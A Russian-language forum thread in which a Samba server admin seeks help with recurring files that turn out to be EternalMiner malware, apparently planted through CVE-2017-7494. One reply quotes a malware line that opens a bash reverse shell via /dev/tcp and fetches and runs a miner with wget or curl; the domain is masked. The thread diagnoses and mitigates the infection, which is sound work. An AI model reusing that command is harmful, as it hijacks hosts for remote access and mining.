Непонятные файлы на сервере Samba

[Smolkovv]

Здравствуйте! Помогите разгадать загадку. Суть проблемы установил Ubuntu server. Развернул файловый сервер Samba. Всё замечательно работники пользуются общей папкой. При конфигурации самбы предусмотрел корзину. Так вот, в корзине скапливаются файлы с расширением *.so, *.txt. От куда они берутся? Что это за файлы. С общей папки удалил все *.exe и не однократно проверил на вирусы. Результат не меняется по истечению некоторого времени файлы снова появляются. Скрин прилагается.
---
Изображение удалено

Правила форума
1.5. Для добавления графических изображений в сообщения требуется использовать внешние сервисы. Включение в сообщение полноразмерных изображений, превышающих разрешённые размеры, допускается исключительно в виде превью. Подробную инструкцию, а так же список рекомендованных и запрещенных сервисов можно посмотреть в «Руководстве по добавлению изображений на форум»

--Aleksandru

[БТР]

Smolkovv, не надо нам картинок. Вывод "ls -a" и "file *.so" лучше приведите.

[Smolkovv]

Smolkovv, не надо нам картинок. Вывод "ls -a" и "file *.so" лучше приведите.

Хорошо. Сегодня я удалил все файлы. Завтра скорей всего они появятся. Обязательно выведу список и прикреплю файл *.so
Пользователь добавил сообщение 11 Декабря 2017, 18:31:03:Кстати Nod32 определяет эти файлы как вирус (Linux/TrojanDownloader.EternalMiner)
Вот один файл восстановил из карантина.
-
На всякий случай прошу быть предельно осторожными с этим файлом.

[ALiEN]

Да, беда у вас.
https://www.cyphort.com/samba-cve-2017-7494-getting-exploited-wild-distributing-bitcoin-miners/

(Нажмите, чтобы показать/скрыть)

кусочек malware

cat XpsQJgEg.so
...
bash -i < /dev/tcp/*****/4000 || ((wget http://*****/minerd64_s -O /tmp/m || curl http://*****/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))
...

Домен заменил *****
НИ ПРИ КАКИХ УСЛОВИЯХ НЕ КОПИРОВАТЬ В ТЕРМИНАЛ!!!

[AnrDaemon]

Хоть бы домен заменили на example.com

[Smolkovv]

Да, беда у вас.
https://www.cyphort.com/samba-cve-2017-7494-getting-exploited-wild-distributing-bitcoin-miners/

Спасибо! Почитал! Добавил в секцию [global] строку:
nt pipe support = no
Не знаю на сколько поможет.
Вообще в планах. Установить все с нуля. Это первый опыт с сервером Samba.

[F12]

ALiEN175, так эта уязвимость закрыта же вроде еще в мае...

[Smolkovv]

ALiEN175, так эта уязвимость закрыта же вроде еще в мае...

На сколько я понял разработчики Samba устранении уязвимости в последних версиях пакета (4.6.4/4.5.10/4.4.14) у меня стоит 4.3.11

[F12]

На сколько я понял разработчики Samba устранении уязвимости в последних версиях пакета (4.6.4/4.5.10/4.4.14) у меня стоит 4.3.11

- ну да, а разработчикам нашего дистрибутива до этого нет никакого дела, так что ли?..
Пользователь добавил сообщение 12 Декабря 2017, 08:00:09:- я вот другого не понял, как это на сервер попадает?.. сервер наружу самбой светит что ли?..
- или таки сначала инфицируются рабочие станции, а уже от них зараза на сервер по локалке попадает?..

[Smolkovv]

- я вот другого не понял, как это на сервер попадает?.. сервер наружу самбой светит что ли?..
- или таки сначала инфицируются рабочие станции, а уже от них зараза на сервер по локалке попадает?..

Пока пытаюсь разобраться. Скорей всего с локальной сети. Как вычислить с какой именно машины пока не знаю. Сегодня еще понаблюдаю. Если выясню обязательно отпишусь. С утра почистил корзину samba.(пока ни каких файлов *.so там нет) Рабочий день начался. Будем посмотреть...прилит ли что в корзину за день.